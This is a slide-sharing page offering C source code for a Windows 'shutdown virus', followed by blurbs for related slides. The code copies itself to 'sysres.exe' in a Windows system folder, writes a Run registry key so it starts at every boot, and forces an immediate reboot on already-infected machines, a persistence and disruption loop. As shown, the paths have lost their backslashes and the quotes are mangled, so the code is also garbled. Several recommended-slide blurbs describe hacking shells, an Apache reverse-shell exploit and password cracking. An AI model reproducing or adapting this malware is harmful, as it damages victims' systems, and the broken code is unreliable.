Windows shutdown virus source code c++
•Download as TXT, PDF•
0 likes•2,042 views
This C code defines functions to check if a computer system is already infected by a virus by looking for a file called "sysres.exe" on drives C, D, E, and F. If the file is not found, the virus file will copy itself to "sysres.exe" on one of the drives and add it to the registry run key so that it executes on startup. If the system is already infected, it will just restart the computer.
Report
Share
Report
Share
![#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:windowssystem“,&ffblk,FA_DIREC); //to determine the root
drive
if(done==0)
{
done=findfirst(“C:windowssystemsysres.exe“,&ffblk,0); //to determine
whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:windowssystem“,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:windowssystemsysres.exe“,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:windowssystem“,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:windowssystemsysres.exe“,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:windowssystem“,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:windowssystemsysres.exe“,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();](https://image.slidesharecdn.com/windowsshutdownvirussourcecodec-130818215612-phpapp01/85/Windows-shutdown-virus-source-code-c-1-320.jpg)
![if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open”s itself
switch(drive_no)
{
case 1:
target=fopen(”C:windowssystemsysres.exe”,”wb”); //to place a copy of
itself in a remote place
system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionRun /v sres /t REG_SZ /d
C:windowssystem sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(”D:windowssystemsysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionRun /v sres /t REG_SZ /d
D:windowssystemsysres.exe”);
break;
case 3:
target=fopen(”E:windowssystemsysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionRun /v sres /t REG_SZ /d
E:windowssystemsysres.exe”);
break;
case 4:
target=fopen(”F:windowssystemsysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionRun /v sres /t REG_SZ /d
F:windowssystemsysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(”shutdown -r -t 0?); //if the system is already infected then just give a
command to restart
}](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
Recommended
C99[2]
This document contains information about c99shell.php, a PHP-based file manager tool intended for hacking. It lists features like managing local and remote files/folders, an advanced SQL manager, executing shell commands and PHP code, and self-removal. The document provides configuration options, registered file types, command aliases, and notes on expected future changes.
Using the Power to Prove
This document discusses using the prove command-line tool to run tests and other scripts. Prove is a test runner that uses the Test Anything Protocol (TAP) to aggregate results. It can run tests and scripts written in any language by specifying the interpreter with --exec. Extensions other than .t can be run by setting --ext. Prove searches for tests in the t/ directory by default but can run any kind of scripts or tasks placed in t/, such as service monitoring scripts. The .proverc file can save common prove options for a project.
Unix Programming with Perl
- The document discusses various aspects of Unix programming using Perl, including handling errors, filehandles after forking processes, and signals.
- It provides examples of how to properly check for errors, avoid resource collisions after forking, and make code cancellable using signals.
- Key topics covered include using the Errno module to check for errors, closing filehandles after forks to prevent sharing issues, and trapping signals like SIGPIPE and SIGTERM.
C99
This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, directories, file types, commands, colors and other options. It checks the client's IP and host name against allowed patterns. If authentication is enabled, it will check the login and password. The script merges request parameters to global variables for use throughout.
Unix 5 en
This document contains a lecture on working with arrays, scripts, and SSH/SCP in UNIX systems. It discusses special variables used in scripts, how to define and manipulate arrays, examples of useful scripts for renaming files, backing up data, and extracting video files from DVDs, and how to use SSH to securely connect to remote systems and SCP to securely transfer files between systems. It also covers generating and using public/private key pairs for passwordless SSH login.
Vcs26
The document discusses various unformatted console I/O functions in C like printf, getchar, putchar, fgetchar, getch, and getche. It explains that getch doesn't wait for enter while getche echoes the character. It also covers low-level disk I/O functions like fgetc and fputc that read and write characters individually from files. The document provides examples of opening a file, reading contents character by character using getc, and copying the contents of one file to another.
Unix Programming with Perl 2
The document summarizes techniques for Unix programming with Perl, focusing on advanced topics like inter-process communication, signals, and avoiding race conditions. It discusses using IPC::Open3 to avoid deadlocks when communicating between processes via pipes. It also covers how to safely sleep while waiting for a signal using POSIX::pselect or a socketpair to avoid race conditions. Proper error handling for signals is mentioned but not shown.
Recommended
C99[2]
This document contains information about c99shell.php, a PHP-based file manager tool intended for hacking. It lists features like managing local and remote files/folders, an advanced SQL manager, executing shell commands and PHP code, and self-removal. The document provides configuration options, registered file types, command aliases, and notes on expected future changes.
Using the Power to Prove
This document discusses using the prove command-line tool to run tests and other scripts. Prove is a test runner that uses the Test Anything Protocol (TAP) to aggregate results. It can run tests and scripts written in any language by specifying the interpreter with --exec. Extensions other than .t can be run by setting --ext. Prove searches for tests in the t/ directory by default but can run any kind of scripts or tasks placed in t/, such as service monitoring scripts. The .proverc file can save common prove options for a project.
Unix Programming with Perl
- The document discusses various aspects of Unix programming using Perl, including handling errors, filehandles after forking processes, and signals.
- It provides examples of how to properly check for errors, avoid resource collisions after forking, and make code cancellable using signals.
- Key topics covered include using the Errno module to check for errors, closing filehandles after forks to prevent sharing issues, and trapping signals like SIGPIPE and SIGTERM.
C99
This document contains the configuration and settings for a PHP shell script called c99shell. It defines variables for authentication, directories, file types, commands, colors and other options. It checks the client's IP and host name against allowed patterns. If authentication is enabled, it will check the login and password. The script merges request parameters to global variables for use throughout.
Unix 5 en
This document contains a lecture on working with arrays, scripts, and SSH/SCP in UNIX systems. It discusses special variables used in scripts, how to define and manipulate arrays, examples of useful scripts for renaming files, backing up data, and extracting video files from DVDs, and how to use SSH to securely connect to remote systems and SCP to securely transfer files between systems. It also covers generating and using public/private key pairs for passwordless SSH login.
Vcs26
The document discusses various unformatted console I/O functions in C like printf, getchar, putchar, fgetchar, getch, and getche. It explains that getch doesn't wait for enter while getche echoes the character. It also covers low-level disk I/O functions like fgetc and fputc that read and write characters individually from files. The document provides examples of opening a file, reading contents character by character using getc, and copying the contents of one file to another.
Unix Programming with Perl 2
The document summarizes techniques for Unix programming with Perl, focusing on advanced topics like inter-process communication, signals, and avoiding race conditions. It discusses using IPC::Open3 to avoid deadlocks when communicating between processes via pipes. It also covers how to safely sleep while waiting for a signal using POSIX::pselect or a socketpair to avoid race conditions. Proper error handling for signals is mentioned but not shown.
Vcs28
The document discusses various ways of interacting with hardware and low-level operations in C programming. It covers opening files, reading and writing files, modifying files, calling BIOS and DOS routines, manipulating CPU registers, and interacting directly with hardware through standard library functions. Examples are provided for copying files, positioning the cursor, clearing the screen, deleting and renaming files by calling interrupt functions. Structures and unions are also explained with examples.
various tricks for remote linux exploits by Seok-Ha Lee (wh1ant)
Modern operating systems include hardened security mechanisms to block exploit attempts. ASLR and NX (DEP) are two examples of the mechanisms that are widely implemented for the sake of security. However, there exists ways to bypass such protections by leveraging advanced exploitation techniques. It becomes harder to achieve code execution when the exploitation originates from a remote location, such as when the attack originates from a client, targeting server daemons. In such cases it is harder to find out the context information of target systems and, therefore, harder to achieve code execution. Knowledge on the memory layout of the targeted process is a crucial piece of the puzzle in developing an exploit, but it is harder to figure out when the exploit attempt is performed remotely. Recently, there have been techniques to leverage information disclosure (memory leak) vulnerabilities to figure out where specific library modules are loaded in the memory layout space, and such classes of vulnerabilities have been proven to be useful to bypass ASLR. However, there is also a different way of figuring out the memory layout of a process running in a remote environment. This method involves probing for valid addresses in target remote process. In a Linux environment, forked child processes will inherit already randomized memory layout from the parent process. Thus every client connection made to server daemons will share the same memory layout. The memory layout randomization is only done during the startup of the parent service process, and not randomized again when it is forking a child process to handle client connections. Due to the inheritance of child processes, it is possible to figure out a small piece of different information from every connection, and these pieces can be assembled later to get the idea of a big picture of the target process's remote memory layout. Probing to see if a given address is a valid memory address in context of the target remote process and assembling such information together, an attacker can figure out where the libc library is loaded on the memory, thus allowing exploits to succeed further in code execution. One might call it brute force, but with a smart brute forcing strategy, the number of minimal required attempts are significantly reduced to less than 10 in usual cases. In this talk, we will be talking about how it is possible to probe for memory layout space utilizing a piece of code to put the target in a blocked state, and to achieve stable code execution in remote exploit attempt scenarios using such information, as well as other tricks that are often used in remote exploit development in the Linux environment.
http://codeblue.jp/en-speaker.html#SeokHaLee
Shell Scripting
Sexta parte da apresentação sobre Shell Scripting realizada na Bluesoft
Confira o video em http://www.vimeo.com/
ch8-pv1-the-virtual-filesystem
The document discusses the virtual filesystem (VFS) and the process of mounting the root filesystem during system bootup. It explains that the VFS acts as an interface between the kernel and actual filesystem implementations. During bootup, the following key steps occur:
1. The root filesystem is mounted
2. Directories are created based on the initramfs
3. Additional directories are created based on the ramdisk
4. Default mounts like tmpfs, devpts, proc and sysfs are performed
5. The init process mounts additional filesystems like data, system based on the init.rc file
Introducing PHP Latest Updates
This document summarizes new features in PHP 5.3, 5.4, and 5.5. It discusses features like namespaces, closures, late static bindings, traits, short array syntax, and more. The document is intended to introduce PHP updates and help software engineers stay up to date on PHP features.
GDG DevFest Kyoto 2014 これからのGoの話をしよう
This document provides information about the GDG DevFest Kyoto 2014 event, including details about the operating system, software versions, and tutorials on using Go, Git/Mercurial, SQL, OpenCV, and the Gobot framework for controlling robots and drones.
Debugging: Rules And Tools - PHPTek 11 Version
The document provides rules and tools for debugging. It discusses understanding the system, making failures reproducible, quitting thinking and closely observing behaviors, dividing problems into smaller pieces, changing one thing at a time, and maintaining an audit trail of changes. Tools mentioned include Xdebug, Selenium, PHPUnit, strace, and source control systems. Logging, instrumentation, and testing techniques are also covered.
Teaching Your Machine To Find Fraudsters
The slides from my talk at PHP Tek 11.
When dealing with money online, fraud is an ongoing problem for both
consumers and sellers. Researchers have been developing statistical
and machine learning techniques to detect shady sellers on auction
sites, spot fraudulent payments on e-commerce systems and catch click
fraud on adverts. While there is no silver bullet, you will learn to
flag suspicious activity and help protect your site from scammers
using PHP and a little help from some other technologies.
Phishing for Root (How I Got Access to Root on Your Computer With 8 Seconds o...
It is often said that if an attacker gets physical access to your computer, all bets are off. In this presentation, I show how an attacker can gain root access to a Mac or Linux computer with just 8 seconds of physical access by using an attack that spoofs the sudo password prompt and cleans up after itself.
PHPerのためのPerl入門@ Kansai.pm#12
The document provides instructions for installing perlbrew and cpanminus on a system. It describes downloading and installing perlbrew to manage multiple perl versions. It also shows how to download and install cpanminus, which is a utility for installing Perl modules from CPAN.
Go for the paranoid network programmer
An enhanced version of the #codemesh2014 talk on network programming in Go. It covers HTTP, HTTPS, TCP/IP, TCP/IP over TLS, UDP and basic cryptographic functions with AES-CBC and RSA.
What's new in PHP 5.5
The document summarizes what's new in PHP 5.5, including the introduction of generators, the finally block, and Opcache being included by default. It discusses removed and deprecated features and provides an overview of the current release status.
Lab test 2
The document contains code for 4 questions answered for Dr. Al-Qadi. Question 1 reads numbers from a file and prints even numbers. Question 2 defines a function to check if a number is perfect by summing its factors. Question 3 defines a function to calculate the roots of a quadratic equation. Question 4 defines a recursive function to calculate the sum of all numbers between two given numbers.
Yg byev2e
This C code defines an exploit that can be used to remotely gain root access on an Apache 2.2.17 server by sending a crafted buffer to port 80. It includes encoded shellcode that executes a reverse shell, and builds a buffer containing NOP sleds, shellcode, and trailing characters to exploit a vulnerability. It connects to the target, sends the malicious buffer, and waits for a reverse shell if successful.
Refactoring to symfony components
The document discusses refactoring a codebase to use Symfony components. It covers installing components via Composer, using the Dependency Injection container Pimple to manage dependencies, refactoring routing logic with the Routing component, and parsing configuration files with the YAML component. It also discusses using the EventDispatcher component to avoid duplicated logic by dispatching events for common tasks like redirection and notifications.
Linux Command Line
The document lists several dangerous Linux commands that could damage a system, as well as some basic Linux commands. It then discusses Linux file permissions and provides examples of changing permissions using chmod. Finally, it describes how to crack Windows passwords by mounting a Windows partition and using chntpw on the SAM file.
Go for the would be network programmer
The document discusses Go programming for network applications. It shows code examples of creating a basic HTTP server that returns "hello world" on the "/hello" endpoint. It demonstrates running servers concurrently by spawning them as goroutines and waiting for them to finish. The document provides a slideshow introduction to networking, concurrency, cryptography and other topics relevant for network programming in Go.
How to stand on the shoulders of giants
The slides from my keynote at PHP NW 2011, about how every great breakthrough is built on the work that has come before it.
자바스터디 4
The document discusses various methods of the File class in Java for working with files and directories. It covers methods for creating and deleting files, getting file attributes like name and path, checking file properties, creating directories, and modifying file timestamps. It also discusses FileInputStream, FileOutputStream, and other I/O classes for reading and writing bytes to files. Overall it provides an overview of common file operations and I/O in Java using the File and associated I/O classes.
Shell and perl scripting classes in mumbai
Shell and perl scripting classes in mumbai
best Shell and perl scripting classes in mumbai with job assistance.
our features are:
expert guidance by it industry professionals
lowest fees of 5000
practical exposure to handle projects
well equiped lab
after course resume writing guidance
Fun with processes - lightning talk
"The other day, I was playing with this idea... I wanted to be able to programmatically download a file..."
These are slides from my lightning talk that I gave on https://twitter.com/CodeElixirIO in August 2018.
(C Program to Simulate a UNIX-based filesystem) My goal is to implem.docx
The document describes implementing a simulation of a UNIX filesystem using a modified binary search tree in C. A single struct will represent nodes for the root, directories, and files with a flag to distinguish types. Commands like ls, mkdir, cd, pwd, addf, mv, cp, rm, bye and whereis will traverse and manipulate the tree. Help is requested on struct design for easy access, searching, insertion and deletion of nodes and tree traversal algorithms.
More Related Content
What's hot
Vcs28
The document discusses various ways of interacting with hardware and low-level operations in C programming. It covers opening files, reading and writing files, modifying files, calling BIOS and DOS routines, manipulating CPU registers, and interacting directly with hardware through standard library functions. Examples are provided for copying files, positioning the cursor, clearing the screen, deleting and renaming files by calling interrupt functions. Structures and unions are also explained with examples.
various tricks for remote linux exploits by Seok-Ha Lee (wh1ant)
Modern operating systems include hardened security mechanisms to block exploit attempts. ASLR and NX (DEP) are two examples of the mechanisms that are widely implemented for the sake of security. However, there exists ways to bypass such protections by leveraging advanced exploitation techniques. It becomes harder to achieve code execution when the exploitation originates from a remote location, such as when the attack originates from a client, targeting server daemons. In such cases it is harder to find out the context information of target systems and, therefore, harder to achieve code execution. Knowledge on the memory layout of the targeted process is a crucial piece of the puzzle in developing an exploit, but it is harder to figure out when the exploit attempt is performed remotely. Recently, there have been techniques to leverage information disclosure (memory leak) vulnerabilities to figure out where specific library modules are loaded in the memory layout space, and such classes of vulnerabilities have been proven to be useful to bypass ASLR. However, there is also a different way of figuring out the memory layout of a process running in a remote environment. This method involves probing for valid addresses in target remote process. In a Linux environment, forked child processes will inherit already randomized memory layout from the parent process. Thus every client connection made to server daemons will share the same memory layout. The memory layout randomization is only done during the startup of the parent service process, and not randomized again when it is forking a child process to handle client connections. Due to the inheritance of child processes, it is possible to figure out a small piece of different information from every connection, and these pieces can be assembled later to get the idea of a big picture of the target process's remote memory layout. Probing to see if a given address is a valid memory address in context of the target remote process and assembling such information together, an attacker can figure out where the libc library is loaded on the memory, thus allowing exploits to succeed further in code execution. One might call it brute force, but with a smart brute forcing strategy, the number of minimal required attempts are significantly reduced to less than 10 in usual cases. In this talk, we will be talking about how it is possible to probe for memory layout space utilizing a piece of code to put the target in a blocked state, and to achieve stable code execution in remote exploit attempt scenarios using such information, as well as other tricks that are often used in remote exploit development in the Linux environment.
http://codeblue.jp/en-speaker.html#SeokHaLee
Shell Scripting
Sexta parte da apresentação sobre Shell Scripting realizada na Bluesoft
Confira o video em http://www.vimeo.com/
ch8-pv1-the-virtual-filesystem
The document discusses the virtual filesystem (VFS) and the process of mounting the root filesystem during system bootup. It explains that the VFS acts as an interface between the kernel and actual filesystem implementations. During bootup, the following key steps occur:
1. The root filesystem is mounted
2. Directories are created based on the initramfs
3. Additional directories are created based on the ramdisk
4. Default mounts like tmpfs, devpts, proc and sysfs are performed
5. The init process mounts additional filesystems like data, system based on the init.rc file
Introducing PHP Latest Updates
This document summarizes new features in PHP 5.3, 5.4, and 5.5. It discusses features like namespaces, closures, late static bindings, traits, short array syntax, and more. The document is intended to introduce PHP updates and help software engineers stay up to date on PHP features.
GDG DevFest Kyoto 2014 これからのGoの話をしよう
This document provides information about the GDG DevFest Kyoto 2014 event, including details about the operating system, software versions, and tutorials on using Go, Git/Mercurial, SQL, OpenCV, and the Gobot framework for controlling robots and drones.
Debugging: Rules And Tools - PHPTek 11 Version
The document provides rules and tools for debugging. It discusses understanding the system, making failures reproducible, quitting thinking and closely observing behaviors, dividing problems into smaller pieces, changing one thing at a time, and maintaining an audit trail of changes. Tools mentioned include Xdebug, Selenium, PHPUnit, strace, and source control systems. Logging, instrumentation, and testing techniques are also covered.
Teaching Your Machine To Find Fraudsters
The slides from my talk at PHP Tek 11.
When dealing with money online, fraud is an ongoing problem for both
consumers and sellers. Researchers have been developing statistical
and machine learning techniques to detect shady sellers on auction
sites, spot fraudulent payments on e-commerce systems and catch click
fraud on adverts. While there is no silver bullet, you will learn to
flag suspicious activity and help protect your site from scammers
using PHP and a little help from some other technologies.
Phishing for Root (How I Got Access to Root on Your Computer With 8 Seconds o...
It is often said that if an attacker gets physical access to your computer, all bets are off. In this presentation, I show how an attacker can gain root access to a Mac or Linux computer with just 8 seconds of physical access by using an attack that spoofs the sudo password prompt and cleans up after itself.
PHPerのためのPerl入門@ Kansai.pm#12
The document provides instructions for installing perlbrew and cpanminus on a system. It describes downloading and installing perlbrew to manage multiple perl versions. It also shows how to download and install cpanminus, which is a utility for installing Perl modules from CPAN.
Go for the paranoid network programmer
An enhanced version of the #codemesh2014 talk on network programming in Go. It covers HTTP, HTTPS, TCP/IP, TCP/IP over TLS, UDP and basic cryptographic functions with AES-CBC and RSA.
What's new in PHP 5.5
The document summarizes what's new in PHP 5.5, including the introduction of generators, the finally block, and Opcache being included by default. It discusses removed and deprecated features and provides an overview of the current release status.
Lab test 2
The document contains code for 4 questions answered for Dr. Al-Qadi. Question 1 reads numbers from a file and prints even numbers. Question 2 defines a function to check if a number is perfect by summing its factors. Question 3 defines a function to calculate the roots of a quadratic equation. Question 4 defines a recursive function to calculate the sum of all numbers between two given numbers.
Yg byev2e
This C code defines an exploit that can be used to remotely gain root access on an Apache 2.2.17 server by sending a crafted buffer to port 80. It includes encoded shellcode that executes a reverse shell, and builds a buffer containing NOP sleds, shellcode, and trailing characters to exploit a vulnerability. It connects to the target, sends the malicious buffer, and waits for a reverse shell if successful.
Refactoring to symfony components
The document discusses refactoring a codebase to use Symfony components. It covers installing components via Composer, using the Dependency Injection container Pimple to manage dependencies, refactoring routing logic with the Routing component, and parsing configuration files with the YAML component. It also discusses using the EventDispatcher component to avoid duplicated logic by dispatching events for common tasks like redirection and notifications.
Linux Command Line
The document lists several dangerous Linux commands that could damage a system, as well as some basic Linux commands. It then discusses Linux file permissions and provides examples of changing permissions using chmod. Finally, it describes how to crack Windows passwords by mounting a Windows partition and using chntpw on the SAM file.
Go for the would be network programmer
The document discusses Go programming for network applications. It shows code examples of creating a basic HTTP server that returns "hello world" on the "/hello" endpoint. It demonstrates running servers concurrently by spawning them as goroutines and waiting for them to finish. The document provides a slideshow introduction to networking, concurrency, cryptography and other topics relevant for network programming in Go.
How to stand on the shoulders of giants
The slides from my keynote at PHP NW 2011, about how every great breakthrough is built on the work that has come before it.
자바스터디 4
The document discusses various methods of the File class in Java for working with files and directories. It covers methods for creating and deleting files, getting file attributes like name and path, checking file properties, creating directories, and modifying file timestamps. It also discusses FileInputStream, FileOutputStream, and other I/O classes for reading and writing bytes to files. Overall it provides an overview of common file operations and I/O in Java using the File and associated I/O classes.
Shell and perl scripting classes in mumbai
Shell and perl scripting classes in mumbai
best Shell and perl scripting classes in mumbai with job assistance.
our features are:
expert guidance by it industry professionals
lowest fees of 5000
practical exposure to handle projects
well equiped lab
after course resume writing guidance
What's hot (20)
various tricks for remote linux exploits by Seok-Ha Lee (wh1ant)
various tricks for remote linux exploits by Seok-Ha Lee (wh1ant)
Phishing for Root (How I Got Access to Root on Your Computer With 8 Seconds o...
Phishing for Root (How I Got Access to Root on Your Computer With 8 Seconds o...
Similar to Windows shutdown virus source code c++
Fun with processes - lightning talk
"The other day, I was playing with this idea... I wanted to be able to programmatically download a file..."
These are slides from my lightning talk that I gave on https://twitter.com/CodeElixirIO in August 2018.
(C Program to Simulate a UNIX-based filesystem) My goal is to implem.docx
The document describes implementing a simulation of a UNIX filesystem using a modified binary search tree in C. A single struct will represent nodes for the root, directories, and files with a flag to distinguish types. Commands like ls, mkdir, cd, pwd, addf, mv, cp, rm, bye and whereis will traverse and manipulate the tree. Help is requested on struct design for easy access, searching, insertion and deletion of nodes and tree traversal algorithms.
101 4.3 control mounting and unmounting of filesystems
Mount points allow partitions and removable drives to be mounted and integrated into the Linux file system hierarchy. Filesystems can be manually mounted using the mount command and specifying the device and mount point directory. Filesystems are unmounted using the umount command on the device or mount point. Mount points are also configured automatically at boot through entries in /etc/fstab that specify the device, filesystem type, and mount options.
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
This document discusses building a Linux IPv6 DNS server. It includes shell scripts and C source code files to perform tasks like checking system details, ensuring root user privileges, cleaning directories, building kernel images, backing up source directories, and adding members to a server via a GUI. The scripts and programs work together to configure, build, and run an IPv6-enabled Linux DNS server.
File management
The document discusses the components of a file system in a UNIX system including the boot block, super block, inode list, and data blocks. It describes the information stored in the super block and inodes. Inodes contain metadata about files such as ownership, permissions, size, and location of data blocks. The document also covers various file-related system calls like open, read, write, close, and lseek. It provides examples of using these calls to perform operations like opening, reading, writing to files and modifying the file offset. File locking mechanisms using flock struct and fcntl calls are also explained.
Hadoop 20111215
The document provides descriptions of various components in Hadoop including Hadoop Core, Pig, ZooKeeper, JobTracker, TaskTracker, NameNode, Secondary NameNode, and the design of HDFS. It also discusses how to deploy Hadoop in a distributed environment and configure core-site.xml, hdfs-site.xml, and mapred-site.xml.
Dance for the puppet master: G6 Tech Talk
Puppet is an open source tool used to automate server configuration management. It ensures servers are configured and packages installed as defined. Puppet manages configuration through resources like packages, files, users and more. It can install packages, configure files and folders, manage services, create users/groups, and run commands. Puppet applies configurations idempotently so they can be run multiple times without changing the server unless the configuration changes.
Confraria SECURITY & IT - Lisbon Set 29, 2011
This document discusses Linux rootkits and how they have evolved from user-land Trojan binaries to kernel-level techniques like syscall patching. It describes how later Linux kernels made syscall patching more difficult by making the syscall table read-only. The document then introduces an alternative technique of hooking the virtual filesystem (VFS) using the /proc filesystem to hide processes, files and directories. It provides code examples for a proof-of-concept rootkit called Fuckit that implements process, file and module hiding through VFS hooks instead of direct syscall patching.
Solaris_quickref.pdf
This document provides a summary of Solaris system configuration files and commands organized by topic. It includes the location and purpose of initialization files, network configuration files, printer setup files, file sharing configuration, sendmail configuration, CDE desktop environment customization files, and system configuration files for users, groups, logging, and more. It also provides examples of common shell scripting constructs and system administration commands.
Create an auto-extractible shell script linux
The document describes how to create an auto-extractible shell script by concatenating three scripts: an "extract.sh" script to extract data from the self-extracting script, an "install.sh" script to install the extracted data, and a "build.sh" script to generate the self-extracting script by combining "install.sh", "extract.sh", and the software data. The "build.sh" script generates a temporary archive of the data and concatenates it with "extract.sh" to create the self-extracting script. When run, the self-extracting script uses "extract.sh" to extract the archived data and then run "install.sh" to install
How to recognise that the user has just uninstalled your android app droidc...
The document describes how to detect when an Android app has been uninstalled using the inotify framework and broadcasting intents. It explains that the standard Java approach does not work because the listener is unregistered on uninstall. Instead, it recommends spawning a new process on uninstall using fork() and inotify to watch for file deletions, then broadcasting an intent to restart the app. However, experts warn against this approach as forking in JNI can break the Android activity lifecycle model.
How to recognise that the user has just uninstalled your android app
A presentation done spontaneously during Droidcon.de 2015.
Shows the trick Opera did - open a web page after uninstalling the binary. Raw meat, C code, included.
start_printf: dev/ic/com.c comstart()
The document discusses code for serial port (com) device drivers in FreeBSD. It shows code from the comstart() function, which is called by the tty layer when there is outgoing data to transmit. Comstart() grabs the data from the tty queue and sets up the com_softc structure to start transmission. It then calls the chip-specific transmit function. The com_softc structure contains a pointer to the associated tty structure.
NUMOSS 4th Week - Commandline Tutorial
The document lists several dangerous commands that can be run on a Linux or Unix system and cause data loss or system instability. It also provides basic commands for file operations, package management, networking tasks and changing permissions and passwords. The dangerous commands include deleting all files in the root folder, formatting a partition, executing a fork bomb to overload the system, and overwriting the file system on a designated device. The basic commands cover file listing, copying, downloading, creating directories and viewing directory information. It also explains Linux file permissions in terms of read, write and execute attributes.
Ataques dirigidos contra activistas
The document discusses several targeted malware attacks and surveillance techniques. It describes malware programs like FinFisher, DarkComet RAT, and Hacking Team's RCS that are used to monitor devices, steal files and communications, and enable remote control. It also mentions vulnerabilities exploited in Microsoft Word and Adobe Reader to install malware. Targets discussed include Uyghurs, Tibetans, and activists. Sources cited include CitizenLab.org, Kaspersky, and Symantec reports on commercial spyware vendors and their government clients.
How to recognise that the user has just uninstalled your app
The document describes how to detect when an Android app has been uninstalled using the inotify framework and starting an intent. It involves:
1. Using JNI to call native code from an Android app that uses inotify to monitor a directory for file deletions.
2. When inotify detects an uninstall, the native code forks a new process to start an intent using the am command.
3. This allows detecting the uninstall even after the app process is killed during uninstallation. However, forking from JNI is not recommended and can break the Android activity lifecycle.
Hadoop
The document provides instructions for running Hadoop in standalone, pseudo-distributed, and fully distributed modes. It discusses downloading and installing Hadoop, configuring environment variables and files for pseudo-distributed mode, starting Hadoop daemons, and running a sample word count MapReduce job locally to test the installation.
vfsStream - a better approach for file system dependent tests
Have you ever been annoyed by testing classes or functions operating on the file system? Be it tests that rely on presence of physical files, the problem of not cleaning up correctly after the test run or checking that your algorithm creates the correct directories and files with correct file permissions. Then this is for you: vfsStream to the rescue!
Ch12 system administration
This document discusses disk and file system troubleshooting and repair. It covers using the newfs command to create file systems, mounting file systems manually and via fstab, checking and repairing file systems with fsck, identifying mounted file systems, unmounting file systems, and configuring and using volume manager. It also discusses recognizing and repairing soft and hard disk errors.
vfsStream - effective filesystem mocking
The document discusses using vfsStream to mock the filesystem in unit tests. vfsStream provides a virtual filesystem that uses PHP streams, allowing tests to manipulate files and directories without interacting with the real filesystem. It describes how to set up vfsStream, create and interact with virtual files and directories, and a vfsStream PHPUnit helper that simplifies its integration with PHPUnit tests.
Similar to Windows shutdown virus source code c++ (20)
(C Program to Simulate a UNIX-based filesystem) My goal is to implem.docx
(C Program to Simulate a UNIX-based filesystem) My goal is to implem.docx
101 4.3 control mounting and unmounting of filesystems
101 4.3 control mounting and unmounting of filesystems
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
Source Code of Building Linux IPv6 DNS Server (Complete Sourcecode)
How to recognise that the user has just uninstalled your android app droidc...
How to recognise that the user has just uninstalled your android app droidc...
How to recognise that the user has just uninstalled your android app
How to recognise that the user has just uninstalled your android app
How to recognise that the user has just uninstalled your app
How to recognise that the user has just uninstalled your app
vfsStream - a better approach for file system dependent tests
vfsStream - a better approach for file system dependent tests
More from Andi Master Hiyperterminal
Hackertest.net (done)
The document describes the steps taken to solve puzzles on the website www.hackertest.net to progress through 20 levels. Various clues and hidden messages in image files, HTML source code, and encrypted texts must be decrypted or found through tools like text editors and GIMP. The puzzles get increasingly difficult and require skills like JavaScript, PHP, HTML, and using graphic software. The document indicates level 20 was passed but is unsure if level 21 exists, as the clues point to adding "22332" to the end of the domain name found in an encrypted text on level 20.
Fiber optik
Sistem operasi fiber optik menggunakan serat optik dan perangkat pendukungnya untuk mengirimkan sinyal cahaya melalui jarak jauh. Serat optik terdiri dari helai kaca tipis yang menyalurkan sinyal cahaya dengan bantuan refleksi internal total. Penyambungan serat optik dilakukan dengan fusion splicer untuk menghubungkan ujung serat yang putus.
Dasar plc ( Ladder Language )
1. Ladder diagram adalah bahasa pemprograman yang paling umum digunakan dalam PLC untuk menggambarkan aliran logika kontrol secara visual menggunakan simbol-simbol seperti kontak, relay, timer dan lainnya. 2. Ladder diagram tersusun atas dua garis vertikal yang mewakili jalur listrik dan garis-garis horizontal di antaranya yang disebut rung untuk menempatkan komponen kontrol. 3. Praktek memori sirkuit (latch) digunak
Binahong
Tanaman binahong berasal dari Korea dan telah lama digunakan dalam obat tradisional Cina. Dokumen ini menjelaskan khasiat tanaman binahong, cara budidaya dan penggunaannya sebagai obat tradisional untuk berbagai penyakit seperti luka, batuk, darah rendah, dan lainnya dengan merebus daunnya. Dianjurkan untuk menanam tanaman ini karena memiliki banyak manfaat kesehatan.
Contoh Jual beli lelang
Surat keterangan ini mendokumentasikan transaksi jual beli tanah seluas 225 meter persegi yang terletak di Dusun Sukun, Desa Pegalangan Kidul, Kecamatan Maron, Kabupaten Probolinggo antara Abdul Haris dan Maskur pada tanggal 20 Januari 1998 dengan harga Rp 22 juta. Kedua belah pihak menyatakan transaksi berlangsung secara sukarela tanpa ada unsur paksaan.
More from Andi Master Hiyperterminal (7)
Recently uploaded
Leveraging Generative AI to Drive Nonprofit Innovation
In this webinar, participants learned how to utilize Generative AI to streamline operations and elevate member engagement. Amazon Web Service experts provided a customer specific use cases and dived into low/no-code tools that are quick and easy to deploy through Amazon Web Service (AWS.)
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering
Syllabus
Chapter-1
Introduction to objective, scope and outcome the subject
Chapter 2
Introduction: Scope and Specialization of Civil Engineering, Role of civil Engineer in Society, Impact of infrastructural development on economy of country.
Chapter 3
